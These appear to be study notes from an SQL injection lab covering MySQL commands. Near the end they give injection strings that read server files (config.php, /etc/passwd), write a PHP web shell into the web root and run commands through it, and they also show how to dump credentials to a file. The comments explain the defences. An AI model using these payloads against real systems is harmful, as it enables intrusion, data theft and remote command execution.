mysql
Apache's configuration found at /etc/apache2/apache2.conf
Nginx's configuration at /etc/nginx/nginx.conf
IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config
# Connect as root; a bare -p makes the client prompt for the password
mysql -u root -p
# Password passed inline (no space after -p): it lands in shell history and can show up
# in the process list, so the prompt form above is the safer habit
mysql -u root -p<password>
# Connect to a remote server: -h is the host, -P (capital) is the TCP port
mysql -u root -h docker.hackthebox.eu -P 3306 -p
# Create a database named users
CREATE DATABASE users;
# Minimal definition: no constraints, so NULLs and duplicate usernames are accepted
CREATE TABLE logins (
id INT,
username VARCHAR(100),
password VARCHAR(100),
date_of_joining DATETIME
);
# Alternative definition of the same table (run one or the other) with constraints:
# id is generated and is the primary key, username must be unique, no column may be NULL
# except date_of_joining, which defaults to the insert time.
# NOTE: the examples on this page put plain-text passwords in the password column;
# a real schema would hold a salted password hash there instead.
CREATE TABLE logins (
id INT NOT NULL AUTO_INCREMENT,
username VARCHAR(100) UNIQUE NOT NULL,
password VARCHAR(100) NOT NULL,
date_of_joining DATETIME DEFAULT NOW(),
PRIMARY KEY (id)
);
# Show the table's structure: column names, data types, nullability, keys and defaults
DESCRIBE logins;
# AUTO_INCREMENT: MySQL fills in the next id on each insert; uniqueness itself comes
# from the PRIMARY KEY (id) declared in the table
id INT NOT NULL AUTO_INCREMENT,
# DEFAULT NOW(): a row inserted without date_of_joining gets the current date and time
date_of_joining DATETIME DEFAULT NOW(),
# --skip-ssl turns TLS off for the whole connection (not just certificate verification),
# so the password exchange and every query travel unencrypted.
# MySQL 8.0 clients spell this --ssl-mode=DISABLED.
mysql -u root -h 94.237.61.84 -P 59610 -p --skip-ssl
# General form: without a column list, a value must be given for every column, in table order
INSERT INTO table_name VALUES (column1_value, column2_value, column3_value, ...);
# All four columns supplied; a date-only value is stored in the DATETIME with time 00:00:00
INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');
# Column list plus several rows in one statement; with the constrained table definition,
# id and date_of_joining are filled in by AUTO_INCREMENT and DEFAULT NOW()
INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');
# List the databases visible to the current account
show databases;
# Make database1 the default database for the statements that follow
use database1;
# List the tables in the current database
show tables;
# Return every column of every row
SELECT * FROM table_name;
# Return only the named columns
SELECT column1, column2 FROM table_name;
# Delete the table and all of its rows (cannot be undone)
DROP TABLE logins;
# Add a new INT column
ALTER TABLE logins ADD newColumn INT;
# Rename a column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;
# Change the data type of a column
ALTER TABLE logins MODIFY oldColumn DATE;
# Remove a column
ALTER TABLE logins DROP oldColumn;
# Update the password of every row whose id is greater than 1;
# without the WHERE clause the UPDATE would rewrite every row in the table
UPDATE logins SET password = 'change_password' WHERE id > 1;
# Sort the result by a column (ascending is the default)
SELECT * FROM logins ORDER BY password;
# ASC or DESC sets the direction; several sort keys are applied left to right
SELECT * FROM logins ORDER BY password DESC;
SELECT * FROM logins ORDER BY password DESC, id ASC;
# Limit the result to the first 2 rows returned
SELECT * FROM logins LIMIT 2;
# LIMIT offset, count: the offset is zero-based (like an array index), so
# LIMIT 1, 2 skips one row and returns the next two, i.e. the 2nd and 3rd rows.
# Without ORDER BY the row order is not guaranteed.
SELECT * FROM logins LIMIT 1, 2;
# Filter rows with a WHERE condition
SELECT * FROM logins WHERE id > 1;
SELECT * FROM logins where username = 'admin';
# LIKE with %: matches usernames that start with 'admin' (% stands for zero or more characters)
SELECT * FROM logins WHERE username LIKE 'admin%';
# LIKE with _: each underscore matches exactly one character, so '___' matches
# usernames that are exactly 3 characters long
SELECT * FROM logins WHERE username like '___';
# Logical operators return 1 for true and 0 for false.
# && and || are MySQL synonyms for AND and OR (|| only while PIPES_AS_CONCAT is not set in sql_mode).
# Returns 1: both comparisons are true
SELECT 1 = 1 AND 'test' = 'test';
# Returns 0: the second comparison is false
SELECT 1 = 1 && 'test' = 'abc';
# Both return 1: one true operand is enough for OR
SELECT 1 = 1 OR 'test' = 'abc';
SELECT 1 = 1 || 'test' = 'abc';
# Both return 0, meaning false: 1 = 1 is true, and NOT / != negate it
SELECT NOT 1 = 1;
SELECT 1 != 1;
# Returns 1, meaning true: 1 = 2 is false, and NOT negates it
SELECT NOT 1 = 2;
# The same operators inside a WHERE clause
SELECT * FROM logins WHERE username != 'john';
SELECT * FROM logins WHERE username != 'john' AND id > 1;
# Arithmetic is evaluated before the comparison, so this is id > 1
SELECT * FROM logins WHERE username != 'tom' AND id > 3 - 2;
# Quizzes
# Rows where either condition holds
select * from titles where emp_no > 10000 or title !='engineer';
# Rows where both conditions hold
select first_name,last_name,hire_date from employees where first_name like 'Bar%' and hire_date = '1990-01-01';
# UNION requires both SELECTs to return the same number of columns, so the two
# departments columns are padded with four literals (employees presumably has six columns)
select * from employees UNION select dept_no,dept_name,3,4,5,6 from departments;
# The lines below are injection strings from the exercises, not standalone SQL. They only
# take effect when the application concatenates the request parameter into its query text;
# binding the value as a prepared-statement parameter keeps it data, so the quote never
# closes the string literal.
# The LOAD_FILE and INTO OUTFILE lines are additionally blocked when the database account
# has no FILE privilege, or when secure_file_priv is NULL or points away from the web root.
' UNION select 1,user(),3,4-- -
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
/shell.php?0=cat ../flag.txt
# Union
UNION SELECT username, 2, 3, 4 from passwords-- '
# Lists the SUPER privilege flag (Y/N) for every account in mysql.user, not only the
# current user; the query itself needs SELECT access to the mysql.user table
SELECT super_priv FROM mysql.user
# Reads /etc/passwd from the database server's filesystem and returns it as a string;
# returns NULL when the file cannot be read or the account lacks the FILE privilege
SELECT LOAD_FILE('/etc/passwd');
# secure_file_priv controls where LOAD_FILE / INTO OUTFILE / LOAD DATA may operate:
#   empty value -> no directory restriction (any path the MySQL OS user can access)
#   a directory -> file operations are confined to that directory
#   NULL        -> file import and export are disabled
# The account also needs the FILE privilege in every case.
# Hardening: set secure_file_priv to NULL or a dedicated directory, and do not grant FILE
# to application accounts.
SHOW VARIABLES LIKE 'secure_file_priv';
# Same value read through information_schema (this table exists in MariaDB and older
# MySQL; newer MySQL versions expose it under performance_schema - verify on the target version)
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
# Write a string to a new file on the database server; INTO OUTFILE does not overwrite an existing file
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
# Export the whole users table to a file on the database server
SELECT * from users INTO OUTFILE '/tmp/credentials';
# Shell command, run on the database host, to view the exported file
cat /tmp/credentials;